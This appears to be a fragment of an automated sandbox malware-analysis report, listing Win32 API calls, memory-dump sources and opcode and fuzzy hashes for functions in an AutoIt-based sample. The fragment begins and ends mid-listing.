• ScreenToClient.USER32(?,?), ref: 0026DE1F
• ScreenToClient.USER32(?,?), ref: 0026DE43
• InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0026DE5E
Similarity
• API ID: ClientRectScreen$InvalidateWindow
• String ID:
• API String ID: 357397906-0
APIs
• EnterCriticalSection.KERNEL32(?), ref: 00249C7F
  • Part of subcall function 0024AD14: _memset.LIBCMT ref: 0024AD49
• _memmove.LIBCMT ref: 00249CA2
• _memset.LIBCMT ref: 00249CAF
• LeaveCriticalSection.KERNEL32(?), ref: 00249CBF
Similarity
• API ID: CriticalSection_memset$EnterLeave_memmove
• String ID:
• API String ID: 48991266-0
APIs
  • Part of subcall function 0021B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0021B5EB
  • Part of subcall function 0021B58B: SelectObject.GDI32(?,00000000), ref: 0021B5FA
  • Part of subcall function 0021B58B: BeginPath.GDI32(?), ref: 0021B611
  • Part of subcall function 0021B58B: SelectObject.GDI32(?,00000000), ref: 0021B63B
• MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0026E860
• LineTo.GDI32(00000000,?,?), ref: 0026E86D
• EndPath.GDI32(00000000), ref: 0026E87D
• StrokePath.GDI32(00000000), ref: 0026E88B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                 • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                • String ID:
                                                                                                                • API String ID: 1539411459-0
                                                                                                                • Opcode ID: fed650ec33460d7bc450e9a3fbe56cc081a63d6bb408dceec53fdecce46cbdd1
                                                                                                                • Instruction ID: 9534e03ce5889bda8670f152429462834c66e6433143d60261d2fc3a3267c299
                                                                                                                • Opcode Fuzzy Hash: fed650ec33460d7bc450e9a3fbe56cc081a63d6bb408dceec53fdecce46cbdd1
                                                                                                                • Instruction Fuzzy Hash: ABF0823900665ABBDF126F54BC0EFCE3F9AAF06311F048201FA11650E1C7795565DF95
                                                                                                                APIs
                                                                                                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0023D640
                                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 0023D653
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0023D65A
                                                                                                                • AttachThreadInput.USER32(00000000), ref: 0023D661
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                 • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2710830443-0
                                                                                                                • Opcode ID: 704f3125cae17dd4b6f39b3476f32df37cd191935bf63278a6aae4fe17115c59
                                                                                                                • Instruction ID: 5393c34210fd05017deb6e11de308983d2bce75a748dffe0bf3e75a865b2eef6
                                                                                                                • Opcode Fuzzy Hash: 704f3125cae17dd4b6f39b3476f32df37cd191935bf63278a6aae4fe17115c59
                                                                                                                • Instruction Fuzzy Hash: BEE06D75202228BADB201FA2FC0EEDB7F2CEF117B1F008010B61C850A4DAB1A594CBA0
                                                                                                                APIs
                                                                                                                • GetCurrentThread.KERNEL32 ref: 0023BE01
                                                                                                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,0023B9C9), ref: 0023BE08
                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0023B9C9), ref: 0023BE15
                                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,0023B9C9), ref: 0023BE1C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                 • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentOpenProcessThreadToken
                                                                                                                • String ID:
                                                                                                                • API String ID: 3974789173-0
                                                                                                                • Opcode ID: 4ecdb4bda470f38a1be645eb45a75485464bbe64a672f7ab8a3bb73b4039158e
                                                                                                                • Instruction ID: c8f368c967ea748a5e2d7cd1f287c0fdd214cc0b8744568225a554c934151c88
                                                                                                                • Opcode Fuzzy Hash: 4ecdb4bda470f38a1be645eb45a75485464bbe64a672f7ab8a3bb73b4039158e
                                                                                                                • Instruction Fuzzy Hash: 33E08676A523119BD7102FB5BC0CF973BA8EF54792F148818F341DA0C0D7349445CB61
                                                                                                                APIs
                                                                                                                • GetSysColor.USER32(00000008), ref: 0021B0C5
                                                                                                                • SetTextColor.GDI32(?,000000FF), ref: 0021B0CF
                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 0021B0E4
                                                                                                                • GetStockObject.GDI32(00000005), ref: 0021B0EC
                                                                                                                • GetWindowDC.USER32(?,00000000), ref: 0027ECFA
                                                                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 0027ED07
                                                                                                                • GetPixel.GDI32(00000000,?,00000000), ref: 0027ED20
                                                                                                                • GetPixel.GDI32(00000000,00000000,?), ref: 0027ED39
                                                                                                                • GetPixel.GDI32(00000000,?,?), ref: 0027ED59
                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 0027ED64
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                 • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1946975507-0
                                                                                                                • Opcode ID: a4255a93ac720f092b276b41d7792d7b7dd4ba44a86e3b4fa292f39ddce666b7
                                                                                                                • Instruction ID: 33630f8634f8fde1eb4e77f19e74a05cd336210373a3e427867bb01cd60dae3c
                                                                                                                • Opcode Fuzzy Hash: a4255a93ac720f092b276b41d7792d7b7dd4ba44a86e3b4fa292f39ddce666b7
                                                                                                                • Instruction Fuzzy Hash: CCE0ED35510241AEEF225F74BC4DBD83B21AB55335F14C266F66D580E2C7714994DB21
                                                                                                                APIs
                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0023C071
                                                                                                                • UnloadUserProfile.USERENV(?,?), ref: 0023C07D
                                                                                                                • CloseHandle.KERNEL32(?), ref: 0023C086
                                                                                                                • CloseHandle.KERNEL32(?), ref: 0023C08E
                                                                                                                  • Part of subcall function 0023B850: GetProcessHeap.KERNEL32(00000000,?,0023B574), ref: 0023B857
                                                                                                                  • Part of subcall function 0023B850: HeapFree.KERNEL32(00000000), ref: 0023B85E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                 • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                • String ID:
                                                                                                                • API String ID: 146765662-0
                                                                                                                • Opcode ID: 045b10f78d5f9d3d7943927130cf36eb5ab115f59a0f8ac22555345b874a2e59
                                                                                                                • Instruction ID: aed391ef4c4680ea6a24b5a20e56c2d6dd98077af9f4f32a9ac9ca0791282fe0
                                                                                                                • Opcode Fuzzy Hash: 045b10f78d5f9d3d7943927130cf36eb5ab115f59a0f8ac22555345b874a2e59
                                                                                                                • Instruction Fuzzy Hash: 33E0BF3A105006BBCB012F95FD4C859FB26FF493213144225F619819B0CB326435EB50
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                 • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2889604237-0
                                                                                                                • Opcode ID: ad2f7bb56b6069559edb64c93c523e089cf0217a5a5e6c98c8ddd9a5c319fd2c
                                                                                                                • Instruction ID: 8454cb8d24c986d4681f5bb13ea862a03a1e55c8213390421f117489775bdcec
                                                                                                                • Opcode Fuzzy Hash: ad2f7bb56b6069559edb64c93c523e089cf0217a5a5e6c98c8ddd9a5c319fd2c
                                                                                                                • Instruction Fuzzy Hash: 37E04FB9511214EFDB106F70EC4C6A93BE9EB4C360F51C405FC4A97290EAB598948F40
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                 • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2889604237-0
                                                                                                                • Opcode ID: baa960c82edde8d1c6bfb08a164a1372e98b3ed3b2357a3399e78e5dafb88870
                                                                                                                • Instruction ID: cb736032d10b397d9688cb477268cb020f36a0faca3296f5db0dee2abdfa52f7
                                                                                                                • Opcode Fuzzy Hash: baa960c82edde8d1c6bfb08a164a1372e98b3ed3b2357a3399e78e5dafb88870
                                                                                                                • Instruction Fuzzy Hash: B0E04FB9501214EFDB006F70EC4C6593BE9EB4C360F518405FD4A97290EBB599948F00
                                                                                                                APIs
                                                                                                                • __getptd_noexit.LIBCMT ref: 00224C3E
                                                                                                                  • Part of subcall function 002286B5: GetLastError.KERNEL32(?,00220127,002288A3,00224673,?,?,00220127,?,0020125D,00000058,?,?), ref: 002286B7
                                                                                                                  • Part of subcall function 002286B5: __calloc_crt.LIBCMT ref: 002286D8
                                                                                                                  • Part of subcall function 002286B5: GetCurrentThreadId.KERNEL32 ref: 00228701
                                                                                                                  • Part of subcall function 002286B5: SetLastError.KERNEL32(00000000,00220127,002288A3,00224673,?,?,00220127,?,0020125D,00000058,?,?), ref: 00228719
                                                                                                                • CloseHandle.KERNEL32(?,?,00224C1D), ref: 00224C52
                                                                                                                • __freeptd.LIBCMT ref: 00224C59
                                                                                                                • ExitThread.KERNEL32 ref: 00224C61
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                 • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastThread$CloseCurrentExitHandle__calloc_crt__freeptd__getptd_noexit
                                                                                                                • String ID:
                                                                                                                • API String ID: 408300095-0
                                                                                                                • Opcode ID: a5908b2f4f0ccc5c13b45eaca956ef112c05b09992275f841b52dd6f1e87baec
                                                                                                                • Instruction ID: f635cb478df2e435fc41f00abc7c43817899029050ff2c91911807ba607e99db
                                                                                                                • Opcode Fuzzy Hash: a5908b2f4f0ccc5c13b45eaca956ef112c05b09992275f841b52dd6f1e87baec
                                                                                                                • Instruction Fuzzy Hash: FFD0A731413A726BC2313FA4BD0D61D33549F01B25B018305E035250E08F2498254F91
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: _memmove
• String ID: >$DEFINE
• API String ID: 4104443479-1664449232
• Opcode ID: 87b6146b3175d192f362fa61e5ca4919a50900e284e013991f9d8af198819df5
• Instruction ID: 53a31a8480bae6f9395b576d6eed040c40323edf612e9ebd74a9c4e3bda78097
• Opcode Fuzzy Hash: 87b6146b3175d192f362fa61e5ca4919a50900e284e013991f9d8af198819df5
• Instruction Fuzzy Hash: FB129E79E2120ADFCF24DF98C4846ADB7B1FF48310F15825AE809AB391D734ADA5CB50
APIs
• OleSetContainedObject.OLE32(?,00000001), ref: 0023ECA0
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: ContainedObject
• String ID: AutoIt3GUI$Container
• API String ID: 3565006973-3941886329
• Opcode ID: 31cb610b2f6a92e1ea907830ed3072b44e1337b8dfc0b840f1227b38f778e0fa
• Instruction ID: e3dd5dfcb8cf4b5e21121fcfab5fd98d4b08bfdbb2df3e69da47564c3e8a3a8c
• Opcode Fuzzy Hash: 31cb610b2f6a92e1ea907830ed3072b44e1337b8dfc0b840f1227b38f778e0fa
• Instruction Fuzzy Hash: 39915AB4620302DFDB14DF64C884B6ABBB9BF49710F15846EE84ACB291DBB0E855CF50
APIs
  • Part of subcall function 00203BCF: _wcscpy.LIBCMT ref: 00203BF2
  • Part of subcall function 002084A6: __swprintf.LIBCMT ref: 002084E5
  • Part of subcall function 002084A6: __itow.LIBCMT ref: 00208519
• __wcsnicmp.LIBCMT ref: 0024E785
• WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0024E84E
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
• String ID: LPT
• API String ID: 3222508074-1350329615
• Opcode ID: bb91d36e7bb388b98b65a2bac2ee8a18272bf791a93e50fdfb8ad650c9bf95f1
• Instruction ID: 9ef9bf08caf8b0fbbbc06af6da508463b6a41e62ad11b30bc19c86068cc3c073
• Opcode Fuzzy Hash: bb91d36e7bb388b98b65a2bac2ee8a18272bf791a93e50fdfb8ad650c9bf95f1
• Instruction Fuzzy Hash: 2B616E75A20215AFDF18DF94C895EAEB7B8FF08310F164069F546AB2A1DB70AE50CB50
APIs
• Sleep.KERNEL32(00000000), ref: 00201B83
• GlobalMemoryStatusEx.KERNEL32 ref: 00201B9C
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
• API String ID: 2783356886-2766056989
• Opcode ID: 15778be1fba56786918fba06777ce3a95a3a3187e2bd17c97843aa576fef5c50
• Instruction ID: ad640a96e395749b361595eab9824a29fa8ad477f8a5ae26bb107019bb6e5916
• Opcode Fuzzy Hash: 15778be1fba56786918fba06777ce3a95a3a3187e2bd17c97843aa576fef5c50
• Instruction Fuzzy Hash: 35512971418744EBE320AF14D889BABBBECFF95354F81484DF1C8410A6EB7195BC8B56
APIs
  • Part of subcall function 0020417D: __fread_nolock.LIBCMT ref: 0020419B
• _wcscmp.LIBCMT ref: 0024CF49
• _wcscmp.LIBCMT ref: 0024CF5C
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: _wcscmp$__fread_nolock
• String ID: FILE
• API String ID: 4029003684-3121273764
• Opcode ID: 7b90a092d389e4e76d93f7411375c62966db0fac79e5cb92357879d7536db972
• Instruction ID: ac4e95dbf4935cfc6d243d214fd88be811529b77c66a3b741df022c524cc146b
• Opcode Fuzzy Hash: 7b90a092d389e4e76d93f7411375c62966db0fac79e5cb92357879d7536db972
• Instruction Fuzzy Hash: 6641F872610219BADF10EFA4DC41FEFBBB99F49710F10046AF605E7191D7719A688B50
APIs
  • Part of subcall function 0022889E: __getptd_noexit.LIBCMT ref: 0022889E
• __getbuf.LIBCMT ref: 00229B8A
• __lseeki64.LIBCMT ref: 00229BFA
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: __getbuf__getptd_noexit__lseeki64
• String ID: pM#
• API String ID: 3311320906-1275130232
• Opcode ID: e02cf580c910585dc27347711ef9089ec4dc068eee8ea7bff37dd414632be3b2
• Instruction ID: 90aed403f0e8186baa922aa88ac7f37bbc2e0e4f1db507b861eaa900229ff2a0
• Opcode Fuzzy Hash: e02cf580c910585dc27347711ef9089ec4dc068eee8ea7bff37dd414632be3b2
• Instruction Fuzzy Hash: EE412671530B267ED3349FA8F891A7A77D49B49334F04861EE4AA8B2D1D374D8A08F10
APIs
• SendMessageW.USER32(00000027,00001132,00000000,?), ref: 0026A668
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0026A67D
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: MessageSend
• String ID: '
• API String ID: 3850602802-1997036262
• Opcode ID: c42b8e3a795203678635606c0a33e6248f6a46fd1d10272a105ed124267648ac
• Instruction ID: 6d14809801c53a4e94c6322a2dfd969713a6ebcfee4dfc5e5daf3bde7e6d050a
• Opcode Fuzzy Hash: c42b8e3a795203678635606c0a33e6248f6a46fd1d10272a105ed124267648ac
• Instruction Fuzzy Hash: 0E410775E1020A9FDF14CF68D881BDA7BB9FB09300F14016AE915AB381D770A995CFA1
APIs
• DestroyWindow.USER32(?,?,?,?), ref: 0026961B
• MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00269657
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: Window$DestroyMove
• String ID: static
• API String ID: 2139405536-2160076837
• Opcode ID: 7071c8c86dcb1d1370428b8a076f2f24ea1a229025f19c73c876aea2a5c14139
• Instruction ID: a6fad3de12cbe5413df8393334497f9c0f09d1b96e346c10f0b84e3601d9f256
• Opcode Fuzzy Hash: 7071c8c86dcb1d1370428b8a076f2f24ea1a229025f19c73c876aea2a5c14139
• Instruction Fuzzy Hash: CD318C31520204AEEB109F64DC81FFB77ADFF58764F508619F9A9C7190DA71ACE18B60
APIs
• _memset.LIBCMT ref: 00245BE4
• GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00245C1F
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: InfoItemMenu_memset
• String ID: 0
• API String ID: 2223754486-4108050209
• Opcode ID: 5b739822b837bed1f5b48e4b035934d6a28c7584d282259f2615a8c1f2946429
• Instruction ID: 51155a9a7b13c473bf12204301b5b7878e8eb3fd3c6575d8bbc1314a697f3bf8
• Opcode Fuzzy Hash: 5b739822b837bed1f5b48e4b035934d6a28c7584d282259f2615a8c1f2946429
• Instruction Fuzzy Hash: 6531DB3152072AEBDB2CCF98D8C5BADBBF5EF05354F18001AE9C5961A2D7B09A64CF10
                                                                                                                APIs
                                                                                                                • __snwprintf.LIBCMT ref: 00256BDD
                                                                                                                  • Part of subcall function 0020CAEE: _memmove.LIBCMT ref: 0020CB2F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
